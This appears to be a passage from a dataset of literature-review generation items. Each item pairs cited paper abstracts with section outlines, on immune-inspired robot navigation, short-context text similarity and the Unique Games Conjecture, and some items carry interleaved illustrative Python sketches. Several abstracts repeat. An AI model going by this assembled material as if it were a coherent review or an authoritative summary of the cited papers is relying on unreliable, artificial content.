Cohn contend that the conceptual foundations for such idiotypic networks are formal absurdities. --- paper_title: AIS Based Robot Navigation in a Rescue Scenario paper_content: An architecture for a robot control is proposed which is based on the requirements from the RoboCup and AAAI Rescue Robot Competition. An artificial immune system comprises the core component. 
The suitability of this architecture for the competition and related scenarios, including the modelling of the environment, was verified by simulation. --- paper_title: Danger Theory: The Link between AIS and IDS? paper_content: We present ideas about creating a next generation Intrusion Detection System based on the latest immunological theories. The central challenge with computer security is determining the difference between normal and potentially harmful activity. For half a century, developers have protected their systems by coding rules that identify and block specific events. However, the nature of current and future threats in conjunction with ever larger IT systems urgently requires the development of automated and adaptive defensive tools. A promising solution is emerging in the form of Artificial Immune Systems. The Human Immune System can detect and defend against harmful and previously unseen invaders, so can we not build a similar Intrusion Detection System for our computers. --- paper_title: Soft Computing-Based Navigation Schemes for a Real Wheeled Robot Moving Among Static Obstacles paper_content: Collision-free, time-optimal navigation of a real wheeled robot in the presence of some static obstacles is undertaken in the present study. Two soft computing-based approaches, namely genetic-fuzzy system and genetic-neural system and a conventional potential field approach have been developed for this purpose. Training is given to the soft computing-based navigation schemes off-line and the performance of the optimal motion planner is tested on a real robot. A CCD camera is used to collect information of the environment. After processing the collected data, the communication between the robot and the host computer is obtained with the help of a radio-frequency module. Both the soft computing-based approaches are found to perform better than the potential field method in terms of the traveling time taken by the robot. Moreover, the performance of fuzzy logic-based motion planner is found to be comparable with that of neural network-based motion planner, although the training of the former is seen to be computationally less expensive than the latter. Sometimes the potential field method is unable to yield any feasible solution, specifically when the obstacle is found to be just ahead of the robot, whereas soft computing-based approaches have tackled such a situation well. --- paper_title: Solving the potential field local minimum problem using internal agent states paper_content: We propose a new, extended artificial potential field method, which uses dynamic internal agent states. The internal states are modeled as a dynamical system of coupled first order differential equations that manipulate the potential field in which the agent is situated. The internal state dynamics are forced by the interaction of the agent with the external environment. Local equilibria in the potential field are then manipulated by the internal states and transformed from stable equilibria to unstable equilibria, allowing escape from local minima in the potential field. This new methodology successfully solves reactive path planning problems, such as a complex maze with multiple local minima, which cannot be solved using conventional static potential fields. --- paper_title: An immunological approach to mobile robot reactive navigation paper_content: In this paper, a reactive immune network (RIN) is proposed and employed for mobile robot navigation within unknown environments. 
Rather than building a detailed mathematical model of artificial immune systems, this study explores the principles of an immune network, focusing on its self-organization, adaptive learning capability, and immune feedback. In addition, an adaptive virtual target method is integrated to solve the local minima problem in navigation. Several trapping situations designed by earlier researchers are adopted to evaluate the performance of the proposed architecture. Simulation results show that the mobile robot is capable of avoiding obstacles, escaping traps, and reaching the goal efficiently and effectively. --- paper_title: Swarm Robotics: From Sources of Inspiration to Domains of Application paper_content: Swarm robotics is a novel approach to the coordination of large numbers of relatively simple robots which takes its inspiration from social insects. This paper proposes a definition of this newly emerging approach by 1) describing the desirable properties of swarm robotic systems, as observed in the system-level functioning of social insects, 2) proposing a definition for the term swarm robotics, and putting forward a set of criteria that can be used to distinguish swarm robotics research from other multi-robot studies, 3) providing a review of some studies which can act as sources of inspiration, and a list of promising domains for the utilization of swarm robotic systems. --- paper_title: Virtual local target method for avoiding local minimum in potential field based robot navigation paper_content: A novel robot navigation algorithm with global path generation capability is presented. Local minima are among the most intractable, yet most frequently encountered, problems in potential-field-based robot navigation. By appropriately appointing virtual local targets along the journey, the problem can be solved effectively. The key concept employed in this algorithm is the set of rules that govern when and how to appoint these virtual local targets. When the robot finds itself in danger of a local minimum, a virtual local target is appointed to replace the global goal temporarily according to the rules. After the virtual target is reached, the robot continues on its journey by heading towards the global goal. The algorithm prevents the robot from running into local minima again. Simulation results showed that it is very effective in complex obstacle environments. ---
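Several of the navigation papers collected above (the internal-agent-state and virtual-local-target entries in particular) build on the same artificial potential field core: the robot follows the negative gradient of an attractive potential toward the goal plus repulsive potentials around obstacles, and a local minimum occurs where these forces cancel before the goal is reached. The sketch below illustrates only that shared core; the quadratic attractive and inverse repulsive potentials, the gain constants, and the stuck-detection threshold are illustrative assumptions, not the specific formulations used in the cited papers.

```python
import numpy as np

# Illustrative gains and obstacle influence radius (assumptions, not values from the cited papers).
K_ATT, K_REP, RHO_0 = 1.0, 100.0, 2.0

def potential_field_step(pos, goal, obstacles, step=0.05):
    """One gradient-descent step on a classic attractive + repulsive potential."""
    # Attractive force: pulls the robot straight toward the goal.
    force = -K_ATT * (pos - goal)
    for obs in obstacles:
        diff = pos - obs
        rho = np.linalg.norm(diff)
        if 0 < rho < RHO_0:
            # Repulsive force grows sharply as the robot approaches the obstacle.
            force += K_REP * (1.0 / rho - 1.0 / RHO_0) / rho**2 * (diff / rho)
    return pos + step * force, force

pos = np.array([0.0, 0.0])
goal = np.array([10.0, 0.0])
obstacles = [np.array([5.0, 0.0])]   # obstacle directly between start and goal

for _ in range(500):
    pos, force = potential_field_step(pos, goal, obstacles)
    if np.linalg.norm(force) < 1e-3 and np.linalg.norm(pos - goal) > 0.5:
        # Net force near zero while still far from the goal: a local minimum,
        # the trap that the virtual-local-target and internal-state methods above escape.
        print("stuck in a local minimum at", pos)
        break
else:
    print("reached (or approached) the goal at", pos)
```

When the stuck condition triggers, the virtual-local-target approach would temporarily replace `goal` with a nearby waypoint chosen by its rules, which is the escape mechanism described in the abstract above.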
Title: Immuno-inspired robotic applications: a review Section 1: Introduction Description 1: Summarize the background, motivation, and structure of the paper. Section 2: AIS Definitions Description 2: Provide an overview of various AIS models and their relevance to robotic applications. Section 3: Clonal Selection Description 3: Describe the clonal selection theory, its computational interpretation, and its general algorithm. Section 4: Immune Network Description 4: Discuss the immune network theory, its computational interpretation, and its general algorithm. Section 5: Danger Theory Description 5: Explain the danger theory, its computational interpretation, and its general algorithm. Section 6: AIS-based Robotic Applications Description 6: Categorize and describe various AIS-based robotic applications and their computational details, including applications using clonal selection, immune network, danger theory, and other approaches. Section 7: Using AIS Description 7: Analyze the effectiveness of AIS in robotic applications, covering various findings and their implications. Section 8: On immuno-inspired robotics Description 8: Discuss the current trends, challenges, and future directions in immuno-inspired robotics. Section 9: Conclusions Description 9: Summarize the key insights, gaps, and potential future research directions in the field of immuno-inspired robotic applications.
Computational Approaches to Measuring the Similarity of Short Contexts: A Review of Applications and Methods
20
--- paper_title: Bleu: A Method For Automatic Evaluation Of Machine Translation paper_content: Human evaluations of machine translation are extensive but expensive. Human evaluations can take months to finish and involve human labor that can not be reused. We propose a method of automatic machine translation evaluation that is quick, inexpensive, and language-independent, that correlates highly with human evaluation, and that has little marginal cost per run. We present this method as an automated understudy to skilled human judges which substitutes for them when there is need for quick or frequent evaluations. --- paper_title: Understanding The Thematic Structure Of The Qur'an: An Exploratory Multivariate Approach paper_content: In this paper, we develop a methodology for discovering the thematic structure of the Qur'an based on a fundamental idea in data mining and related disciplines: that, with respect to some collection of texts, the lexical frequency profiles of the individual texts are a good indicator of their conceptual content, and thus provide a reliable criterion for their classification relative to one another. This idea is applied to the discovery of thematic interrelationships among the suras (chapters) of the Qur'an by abstracting lexical frequency data from them and then applying hierarchical cluster analysis to that data. The results reported here indicate that the proposed methodology yields usable results in understanding the Qur'an on the basis of its lexical semantics. --- paper_title: Disambiguation by short contexts paper_content: This paper describes a technique that we believe can be of great help in many text-processing situations, and reports on an experiment recently conducted to test its validity and scope. As a background we shall present in the following sections some fundamental clarifications and remarks on our specific view of lemmatization and disambiguation. Our starting point is the double assertion that we believe would be shared by many workers in applied computational linguistics and large text-processing projects, to wit: that on the one hand lemmatization is one of the most important and crucial steps in many non-trivial text-processing cycles, but on the other hand, no operational, reasonably general, fully automatic and high-quality context-sensitive text-lemmatization system nowadays is easily accessible for any natural language. Given these two premises, the problem is how to introduce a partial element (at least) of machineaided work in the process of text-lemmatization, so as to avoid the extremely laborious and frustrating task of a word-per-word manual lemmatization of large corpora as was done in the early days of automatic text-processing projects. (For a thorough report on mechanical lemmatization programs, see ref. 4.) In this paper we focus on the analysis and experimental testing of one idea that fits naturally into this framework, namely that of disambiguation by short contexts. (The somewhat unexpected shift from "lemmatization" to "disambiguation" will be justified in the sections to come.) Based on --- paper_title: Experiments in automatic statistical thesaurus construction paper_content: A well constructed thesaurus has long been recognized as a valuable tool in the effective operation of an information retrieval system. 
This paper reports the results of experiments designed to determine the validity of an approach to the automatic construction of global thesauri (described originally by Crouch in [1] and [2] based on a clustering of the document collection. The authors validate the approach by showing that the use of thesauri generated by this method results in substantial improvements in retrieval effectiveness in four test collections. The term discrimination value theory, used in the thesaurus generation algorithm to determine a term's membership in a particular thesaurus class, is found not to be useful in distinguishing a “good” from an “indifferent” or “poor” thesaurus class). In conclusion, the authors suggest an alternate approach to automatic thesaurus construction which greatly simplifies the work of producing viable thesaurus classes. Experimental results show that the alternate approach described herein in some cases produces thesauri which are comparable in retrieval effectiveness to those produced by the first method at much lower cost. --- paper_title: Bleu: A Method For Automatic Evaluation Of Machine Translation paper_content: Human evaluations of machine translation are extensive but expensive. Human evaluations can take months to finish and involve human labor that can not be reused. We propose a method of automatic machine translation evaluation that is quick, inexpensive, and language-independent, that correlates highly with human evaluation, and that has little marginal cost per run. We present this method as an automated understudy to skilled human judges which substitutes for them when there is need for quick or frequent evaluations. --- paper_title: Concept based query expansion paper_content: Query expansion methods have been studied for a long time - with debatable success in many instances. In this paper we present a probabilistic query expansion model based on a similarity thesaurus which was constructed automatically. A similarity thesaurus reflects domain knowledge about the particular collection from which it is constructed. We address the two important issues with query expansion: the selection and the weighting of additional search terms. In contrast to earlier methods, our queries are expanded by adding those terms that are most similar to the concept of the query, rather than selecting terms that are similar to the query terms. Our experiments show that this kind of query expansion results in a notable improvement in the retrieval effectiveness when measured using both recall-precision and usefulness. --- paper_title: Using WordNet-Based Context Vectors To Estimate The Semantic Relatedness Of Concepts paper_content: In this paper, we introduce a WordNetbased measure of semantic relatedness by combining the structure and content of WordNet with co–occurrence information derived from raw text. We use the co–occurrence information along with the WordNet definitions to build gloss vectors corresponding to each concept in WordNet. Numeric scores of relatedness are assigned to a pair of concepts by measuring the cosine of the angle between their respective gloss vectors. We show that this measure compares favorably to other measures with respect to human judgments of semantic relatedness, and that it performs well when used in a word sense disambiguation algorithm that relies on semantic relatedness. This measure is flexible in that it can make comparisons between any two concepts without regard to their part of speech. 
In addition, it can be adapted to different domains, since any plain text corpus can be used to derive the co–occurrence information. --- paper_title: Word Sense Discrimination By Clustering Contexts In Vector And Similarity Spaces paper_content: This paper systematically compares unsupervised word sense discrimination techniques that cluster instances of a target word that occur in raw text using both vector and similarity spaces. The context of each instance is represented as a vector in a high dimensional feature space. Discrimination is achieved by clustering these context vectors directly in vector space and also by finding pairwise similarities among the vectors and then clustering in similarity space. We employ two different representations of the context in which a target word occurs. First order context vectors represent the context of each instance of a target word as a vector of features that occur in that context. Second order context vectors are an indirect representation of the context based on the average of vectors that represent the words that occur in the context. We evaluate the discriminated clusters by carrying out experiments using sense–tagged instances of 24 SENSEVAL2 words and the well known Line, Hard and Serve sense–tagged corpora. --- paper_title: Distinguishing Word Senses In Untagged Text paper_content: This paper describes an experimental comparison of three unsupervised learning algorithms that distinguish the sense of an ambiguous word in untagged text. The methods described in this paper, McQuitty's similarity analysis, Ward's minimum-variance method, and the EM algorithm, assign each instance of an ambiguous word to a known sense definition based solely on the values of automatically identifiable features in text. These methods and feature sets are found to be more successful in disambiguating nouns rather than adjectives or verbs. Overall, the most accurate of these procedures is McQuitty's similarity analysis in combination with a high dimensional feature set. --- paper_title: A web-based kernel function for measuring the similarity of short text snippets paper_content: Determining the similarity of short text snippets, such as search queries, works poorly with traditional document similarity measures (e.g., cosine), since there are often few, if any, terms in common between two short text snippets. We address this problem by introducing a novel method for measuring the similarity between short text snippets (even those without any overlapping terms) by leveraging web search results to provide greater context for the short texts. In this paper, we define such a similarity kernel function, mathematically analyze some of its properties, and provide examples of its efficacy. We also show the use of this kernel function in a large-scale system for suggesting related queries to search engine users. --- paper_title: Evaluation Of Utility Of LSA For Word Sense Discrimination paper_content: The goal of the on-going project described in this paper is evaluation of the utility of Latent Semantic Analysis (LSA) for unsupervised word sense discrimination. The hypothesis is that LSA can be used to compute context vectors for ambiguous words that can be clustered together --- with each cluster corresponding to a different sense of the word. In this paper we report first experimental result on tightness, separation and purity of sense-based clusters as a function of vector space dimensionality and using different distance metrics. 
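The discrimination and web-kernel papers above all start from the same first-order representation: a short context becomes a vector of the terms it contains, and two contexts are compared by the cosine of the angle between their vectors, which is near zero whenever the snippets share few or no terms. A minimal sketch of that baseline follows; the whitespace tokenizer and the example snippets are assumptions chosen only for illustration.

```python
import math
from collections import Counter

def first_order_vector(context):
    """Bag-of-words ('first order') representation of a short context."""
    return Counter(context.lower().split())

def cosine(u, v):
    dot = sum(u[w] * v[w] for w in u if w in v)
    norm = math.sqrt(sum(c * c for c in u.values())) * math.sqrt(sum(c * c for c in v.values()))
    return dot / norm if norm else 0.0

a = "the bank raised interest rates on deposits"
b = "lenders increased borrowing costs for savers"      # related meaning, no shared terms
c = "they walked along the river bank in the evening"   # different sense, some shared terms

va, vb, vc = map(first_order_vector, (a, b, c))
print(cosine(va, vb))   # 0.0: first-order matching misses the semantic relation
print(cosine(va, vc))   # > 0 purely because of the overlapping words 'the' and 'bank'
```

The zero score for two clearly related snippets is the failure mode that the web-search-expansion and second-order approaches in the surrounding entries are designed to repair.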
--- paper_title: A solution to Plato’s problem: The latent semantic analysis theory of acquisition, induction, and representation of knowledge paper_content: How do people know as much as they do with as little information as they get? The problem takes many forms; learning vocabulary from text is an especially dramatic and convenient case for research. A new general theory of acquired similarity and knowledge representation, latent semantic analysis (LSA), is presented and used to successfully simulate such learning and several other psycholinguistic phenomena. By inducing global knowledge indirectly from local co-occurrence data in a large body of representative text, LSA acquired knowledge about the full vocabulary of English at a comparable rate to schoolchildren. LSA uses no prior linguistic or perceptual similarity knowledge; it is based solely on a general mathematical learning method that achieves powerful inductive effects by extracting the right number of dimensions (e.g., 300) to represent objects and contexts. Relations to other theories, phenomena, and problems are sketched. --- paper_title: Word Sense Discrimination By Clustering Contexts In Vector And Similarity Spaces paper_content: This paper systematically compares unsupervised word sense discrimination techniques that cluster instances of a target word that occur in raw text using both vector and similarity spaces. The context of each instance is represented as a vector in a high dimensional feature space. Discrimination is achieved by clustering these context vectors directly in vector space and also by finding pairwise similarities among the vectors and then clustering in similarity space. We employ two different representations of the context in which a target word occurs. First order context vectors represent the context of each instance of a target word as a vector of features that occur in that context. Second order context vectors are an indirect representation of the context based on the average of vectors that represent the words that occur in the context. We evaluate the discriminated clusters by carrying out experiments using sense–tagged instances of 24 SENSEVAL2 words and the well known Line, Hard and Serve sense–tagged corpora. --- paper_title: Indexing by Latent Semantic Analysis paper_content: A new method for automatic indexing and retrieval is described. The approach is to take advantage of implicit higher-order structure in the association of terms with documents (“semantic structure”) in order to improve the detection of relevant documents on the basis of terms found in queries. The particular technique used is singular-value decomposition, in which a large term by document matrix is decomposed into a set of ca. 100 orthogonal factors from which the original matrix can be approximated by linear combination. Documents are represented by ca. 100 item vectors of factor weights. Queries are represented as pseudo-document vectors formed from weighted combinations of terms, and documents with supra-threshold cosine values are returned. initial tests find this completely automatic method for retrieval to be promising. --- paper_title: A solution to Plato’s problem: The latent semantic analysis theory of acquisition, induction, and representation of knowledge paper_content: How do people know as much as they do with as little information as they get? The problem takes many forms; learning vocabulary from text is an especially dramatic and convenient case for research. 
A new general theory of acquired similarity and knowledge representation, latent semantic analysis (LSA), is presented and used to successfully simulate such learning and several other psycholinguistic phenomena. By inducing global knowledge indirectly from local co-occurrence data in a large body of representative text, LSA acquired knowledge about the full vocabulary of English at a comparable rate to schoolchildren. LSA uses no prior linguistic or perceptual similarity knowledge; it is based solely on a general mathematical learning method that achieves powerful inductive effects by extracting the right number of dimensions (e.g., 300) to represent objects and contexts. Relations to other theories, phenomena, and problems are sketched. --- paper_title: Using WordNet-Based Context Vectors To Estimate The Semantic Relatedness Of Concepts paper_content: In this paper, we introduce a WordNetbased measure of semantic relatedness by combining the structure and content of WordNet with co–occurrence information derived from raw text. We use the co–occurrence information along with the WordNet definitions to build gloss vectors corresponding to each concept in WordNet. Numeric scores of relatedness are assigned to a pair of concepts by measuring the cosine of the angle between their respective gloss vectors. We show that this measure compares favorably to other measures with respect to human judgments of semantic relatedness, and that it performs well when used in a word sense disambiguation algorithm that relies on semantic relatedness. This measure is flexible in that it can make comparisons between any two concepts without regard to their part of speech. In addition, it can be adapted to different domains, since any plain text corpus can be used to derive the co–occurrence information. ---
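The LSA and gloss-vector measures summarized above both sidestep that sparsity by representing a context indirectly: each word is first mapped to a vector of its co-occurrences (or to a reduced SVD space), the vectors of the words appearing in the context are averaged, and two contexts are compared by the cosine of their averaged vectors. A minimal sketch of that second-order construction follows; the four-sentence toy corpus, the sentence-wide co-occurrence window, and the example contexts are assumptions for illustration only, not the corpora or window sizes used in the cited work.

```python
from collections import defaultdict
import numpy as np

corpus = [
    "interest rates rose at the bank",
    "the bank lowered interest rates",
    "the river bank was muddy after the rain",
    "they fished from the river bank",
]

# Word-by-word co-occurrence vectors over the toy corpus (window = whole sentence).
vocab = sorted({w for line in corpus for w in line.split()})
index = {w: i for i, w in enumerate(vocab)}
cooc = defaultdict(lambda: np.zeros(len(vocab)))
for line in corpus:
    words = line.split()
    for w in words:
        for other in words:
            if other != w:
                cooc[w][index[other]] += 1.0

def second_order_vector(context):
    """Average the co-occurrence vectors of the words occurring in the context."""
    vecs = [cooc[w] for w in context.split() if w in cooc]
    return np.mean(vecs, axis=0) if vecs else np.zeros(len(vocab))

def cosine(u, v):
    n = np.linalg.norm(u) * np.linalg.norm(v)
    return float(u @ v / n) if n else 0.0

# Unlike the first-order representation, two contexts with no words in common
# can still receive a nonzero similarity, because their words co-occur with
# similar neighbours in the corpus.
print(cosine(second_order_vector("rates rose"), second_order_vector("bank lowered")))
print(cosine(second_order_vector("muddy river"), second_order_vector("rates rose")))
```

Replacing the raw co-occurrence matrix with its truncated SVD, as in LSA, would give the same pipeline with lower-dimensional, smoothed word vectors.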
Title: Computational Approaches to Measuring the Similarity of Short Contexts: A Review of Applications and Methods Section 1: Introduction Description 1: Overview of short written contexts, their importance, and why measuring their similarity poses a challenge. Section 2: Similar Contexts Description 2: Explanation of how similarity between concepts is defined and its application to short contexts. Section 3: Types of Short Contexts Description 3: Differentiation between headed and headless short contexts, including their characteristics and applications. Section 4: Examples of Headed Contexts Description 4: Illustration of how headed contexts can be used for word sense discrimination and name discrimination with specific examples. Section 5: Examples of Headless Contexts Description 5: Demonstration of how headless contexts are utilized by examining specific examples and discussing their broader applications. Section 6: Applications Description 6: Discussion on various problems that can be solved by identifying similar short contexts, including both headed and headless applications. Section 7: Headless Applications Description 7: Examination of different forms of headless contexts and their practical applications, such as automated grading and content filtering. Section 8: Pair-wise Comparison of Headless Contexts to Reference Samples Description 8: Overview of how headless contexts can be compared to reference samples in various applications like plagiarism detection and automated grading. Section 9: Clustering N Headless Contexts Description 9: Methods for clustering headless short contexts for organization and classification, including specific use cases. Section 10: Headed / Target Word Applications Description 10: Discussion on applications that focus on target words within contexts, including word sense disambiguation and name discrimination. Section 11: Pair-wise Comparison of Headed Contexts to Reference Samples Description 11: Analysis of how headed contexts are compared to reference samples to perform tasks like word sense disambiguation. Section 12: Clustering N Headed Contexts Description 12: Overview of clustering methods for headed short contexts to determine underlying meanings or senses of target words. Section 13: Summary of Applications Description 13: Summary of various applications of identifying similar short contexts and how different methods can approach these problems. Section 14: First-order Similarity Description 14: Explanation of first-order similarity methods based on word matching and their limitations. Section 15: Second-order Similarity Description 15: Introduction to second-order similarity methods using word vectors and their benefits over first-order methods. Section 16: Word Vectors Description 16: Description of how word vectors are constructed and used in second-order similarity methods. Section 17: Micro View of Context Description 17: In-depth look at the micro view of context involving local co-occurrences of words. Section 18: Macro View of Context Description 18: Examination of the macro view of context involving categorization based on the types of contexts where a word appears. Section 19: Context as an Average of Word Vectors Description 19: Methodology for representing short contexts as averages of word vectors and the advantages it provides for similarity measurement. Section 20: Conclusion Description 20: Summary of the discussed methods for measuring the similarity of short contexts and their practical implications.
On the Unique Games Conjecture (Invited Survey)
12
--- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: Some optimal inapproximability results paper_content: We prove optimal, up to an arbitrary e > 0, inapproximability results for Max-E k-Sat for k ≥ 3, maximizing the number of satisfied linear equations in an over-determined system of linear equations modulo a prime p and Set Splitting. As a consequence of these results we get improved lower bounds for the efficient approximability of many optimization problems studied previously. In particular, for Max-E2-Sat, Max-Cut, Max-di-Cut, and Vertex cover. --- paper_title: Limit theorems for polylinear forms paper_content: The limit theorems for polylinear forms are obtained. Conditions are found under which the distribution of the polylinear form of many random variables is essentially the same as if all the distributions of arguments were normal. --- paper_title: Inapproximability of NP-complete problems, discrete fourier analysis, and geometry paper_content: This article gives a survey of recent results that connect three areas in com- puter science and mathematics: (1) (Hardness of) computing approximate solutions to NP-complete problems. (2) Fourier analysis of boolean functions on boolean hypercube. (3) Certain problems in geometry, especially related to isoperimetry and embeddings between metric spaces. --- paper_title: Optimal algorithms and inapproximability results for every CSP? paper_content: Semidefinite Programming(SDP) is one of the strongest algorithmic techniques used in the design of approximation algorithms. In recent years, Unique Games Conjecture(UGC) has proved to be intimately connected to the limitations of Semidefinite Programming. Making this connection precise, we show the following result : If UGC is true, then for every constraint satisfaction problem(CSP) the best approximation ratio is given by a certain simple SDP. Specifically, we show a generic conversion from SDP integrality gaps to UGC hardness results for every CSP. This result holds both for maximization and minimization problems over arbitrary finite domains. Using this connection between integrality gaps and hardness results we obtain a generic polynomial-time algorithm for all CSPs. Assuming the Unique Games Conjecture, this algorithm achieves the optimal approximation ratio for every CSP. Unconditionally, for all 2-CSPs the algorithm achieves an approximation ratio equal to the integrality gap of a natural SDP used in literature. 
Further the algorithm achieves at least as good an approximation ratio as the best known algorithms for several problems like MaxCut, Max2Sat, MaxDiCut and Unique Games. --- paper_title: Inapproximability of Combinatorial Optimization Problems paper_content: We survey results on the hardness of approximating combinatorial optimization problems. --- paper_title: The Unique Games Conjecture, Integrality Gap for Cut Problems and Embeddability of Negative Type Metrics into ℓ1 paper_content: In this paper, we disprove a conjecture of Goemans and Linial; namely, that every negative type metric embeds into $\ell_1$ with constant distortion. We show that for an arbitrarily small constant $\delta> 0$, for all large enough $n$, there is an $n$-point negative type metric which requires distortion at least $(\log\log n)^{1/6-\delta}$ to embed into $\ell_1.$ ::: Surprisingly, our construction is inspired by the Unique Games Conjecture (UGC) of Khot, establishing a previously unsuspected connection between probabilistically checkable proof systems (PCPs) and the theory of metric embeddings. We first prove that the UGC implies a super-constant hardness result for the (non-uniform) Sparsest Cut problem. Though this hardness result relies on the UGC, we demonstrate, nevertheless, that the corresponding PCP reduction can be used to construct an "integrality gap instance" for Sparsest Cut. Towards this, we first construct an integrality gap instance for a natural SDP relaxation of Unique Games. Then we "simulate" the PCP reduction and "translate" the integrality gap instance of Unique Games to an integrality gap instance of Sparsest Cut. This enables us to prove a $(\log \log n)^{1/6-\delta}$ integrality gap for Sparsest Cut, which is known to be equivalent to the metric embedding lower bound. --- paper_title: Noise stability of functions with low influences: Invariance and optimality paper_content: In this paper we study functions with low influences on product probability spaces. The analysis of boolean functions with low influences has become a central problem in discrete Fourier analysis. It is motivated by fundamental questions arising from the construction of probabilistically checkable proofs in theoretical computer science and from problems in the theory of social choice in economics. ::: We prove an invariance principle for multilinear polynomials with low influences and bounded degree; it shows that under mild conditions the distribution of such polynomials is essentially invariant for all product spaces. Ours is one of the very few known non-linear invariance principles. It has the advantage that its proof is simple and that the error bounds are explicit. We also show that the assumption of bounded degree can be eliminated if the polynomials are slightly ``smoothed''; this extension is essential for our applications to ``noise stability''-type problems. ::: In particular, as applications of the invariance principle we prove two conjectures: the ``Majority Is Stablest'' conjecture from theoretical computer science, which was the original motivation for this work, and the ``It Ain't Over Till It's Over'' conjecture from social choice theory. --- paper_title: L_1 embeddings of the Heisenberg group and fast estimation of graph isoperimetry paper_content: We survey connections between the theory of bi-Lipschitz embeddings and the Sparsest Cut Problem in combinatorial optimization. 
The story of the Sparsest Cut Problem is a striking example of the deep interplay between analysis, geometry, and probability on the one hand, and computational issues in discrete mathematics on the other. We explain how the key ideas evolved over the past 20 years, emphasizing the interactions with Banach space theory, geometric measure theory, and geometric group theory. As an important illustrative example, we shall examine recently established connections to the the structure of the Heisenberg group, and the incompatibility of its Carnot-Carath\'eodory geometry with the geometry of the Lebesgue space $L_1$. --- paper_title: O(√log n) approximation algorithms for min UnCut, min 2CNF deletion, and directed cut problems paper_content: We give O(√log n)-approximation algorithms for the MIN UNCUT, MIN 2CNF DELETION, DIRECTED BALANCED SEPERATOR, and DIRECTED SPARSEST CUT problems. The previously best known algorithms give an O(log n)-approximation for MIN UNCUT [9], DIRECTED BALANCED SEPERATOR [17], DIRECTED SPARSEST CUT [17], and an O(log n log log n)-approximation for MIN 2CNF DELETION [14].We also show that the integrality gap of an SDP relaxation of the MINIMUM MULTICUT problem is Ω(log n). --- paper_title: Proof verification and the hardness of approximation problems paper_content: We show that every language in NP has a probablistic verifier that checks membership proofs for it using logarithmic number of random bits and by examining a constant number of bits in the proof. If a string is in the language, then there exists a proof such that the verifier accepts with probability 1 (i.e., for every choice of its random string). For strings not in the language, the verifier rejects every provided “proof” with probability at least 1/2. Our result builds upon and improves a recent result of Arora and Safra [1998] whose verifiers examine a nonconstant number of bits in the proof (though this number is a very slowly growing function of the input length). ::: As a consequence, we prove that no MAX SNP-hard problem has a polynomial time approximation scheme, unless NP = P. The class MAX SNP was defined by Papadimitriou and Yannakakis [1991] and hard problems for this class include vertex cover, maximum satisfiability, maximum cut, metric TSP, Steiner trees and shortest superstring. We also improve upon the clique hardness results of Feige et al. [1996] and Arora and Safra [1998] and show that there exists a positive ε such that approximating the maximum clique size in an N-vertex graph to within a factor of Nε is NP-hard. --- paper_title: Probabilistic checking of proofs: a new characterization of NP paper_content: We give a new characterization of NP: the class NP contains exactly those languages <italic>L</italic> for which membership proofs (a proof that an input <italic>x</italic> is in <italic>L</italic>) can be verified probabilistically in polynomial time using <italic>logarithmic</italic> number of random bits and by reading <italic>sublogarithmic</italic> number of bits from the proof. ::: We discuss implications of this characterization; specifically, we show that approximating Clique and Independent Set, even in a very weak sense, is NP-hard. --- paper_title: Interactive proofs and the hardness of approximating cliques paper_content: The contribution of this paper is two-fold. First, a connection is established between approximating the size of the largest clique in a graph and multi-prover interactive proofs. 
Second, an efficient multi-prover interactive proof for NP languages is constructed, where the verifier uses very few random bits and communication bits. Last, the connection between cliques and efficient multi-prover interaction proofs, is shown to yield hardness results on the complexity of approximating the size of the largest clique in a graph. Of independent interest is our proof of correctness for the multilinearity test of functions. --- paper_title: O(√log n) approximation algorithms for min UnCut, min 2CNF deletion, and directed cut problems paper_content: We give O(√log n)-approximation algorithms for the MIN UNCUT, MIN 2CNF DELETION, DIRECTED BALANCED SEPERATOR, and DIRECTED SPARSEST CUT problems. The previously best known algorithms give an O(log n)-approximation for MIN UNCUT [9], DIRECTED BALANCED SEPERATOR [17], DIRECTED SPARSEST CUT [17], and an O(log n log log n)-approximation for MIN 2CNF DELETION [14].We also show that the integrality gap of an SDP relaxation of the MINIMUM MULTICUT problem is Ω(log n). --- paper_title: Some optimal inapproximability results paper_content: We prove optimal, up to an arbitrary e > 0, inapproximability results for Max-E k-Sat for k ≥ 3, maximizing the number of satisfied linear equations in an over-determined system of linear equations modulo a prime p and Set Splitting. As a consequence of these results we get improved lower bounds for the efficient approximability of many optimization problems studied previously. In particular, for Max-E2-Sat, Max-Cut, Max-di-Cut, and Vertex cover. --- paper_title: Economical toric spines via Cheeger's Inequality paper_content: Let $G_{\infty}=(C_m^d)_{\infty}$ denote the graph whose set of vertices is $\{1,..., m\}^d$, where two distinct vertices are adjacent iff they are either equal or adjacent in $C_m$ in each coordinate. Let $G_{1}=(C_m^d)_1$ denote the graph on the same set of vertices in which two vertices are adjacent iff they are adjacent in one coordinate in $C_m$ and equal in all others. Both graphs can be viewed as graphs of the $d$-dimensional torus. We prove that one can delete $O(\sqrt d m^{d-1})$ vertices of $G_1$ so that no topologically nontrivial cycles remain. This improves an $O(d^{\log_2 (3/2)}m^{d-1})$ estimate of Bollob\'as, Kindler, Leader and O'Donnell. We also give a short proof of a result implicit in a recent paper of Raz: one can delete an $O(\sqrt d/m)$ fraction of the edges of $G_{\infty}$ so that no topologically nontrivial cycles remain in this graph. Our technique also yields a short proof of a recent result of Kindler, O'Donnell, Rao and Wigderson; there is a subset of the continuous $d$-dimensional torus of surface area $O(\sqrt d)$ that intersects all nontrivial cycles. All proofs are based on the same general idea: the consideration of random shifts of a body with small boundary and no- nontrivial cycles, whose existence is proved by applying the isoperimetric inequality of Cheeger or its vertex or edge discrete analogues. --- paper_title: Optimization, approximation, and complexity classes paper_content: We define a natural variant of NP, MAX NP , and also a subclass called MAX SNP . These are classes of optimization problems, and in fact contain several natural, well-studied ones. We show that problems in these classes can be approximated with some bounded error. Furthermore, we show that a number of common optimization problems are complete under a kind of careful transformation (called L - reduction ) that preserves approximability. 
